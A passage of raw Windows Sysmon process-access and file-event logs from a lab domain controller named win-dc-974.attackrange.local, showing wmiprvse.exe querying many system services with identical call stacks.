Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67EA9E622B3C5D8D69FF2180D5EBF654,SHA256=A0AA5B808AE2BB083E132081137471A9DF80F528F4C675991998A74464616152,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B6AA-00000000AD01}13356C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B6AA-00000000AD01}13356C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 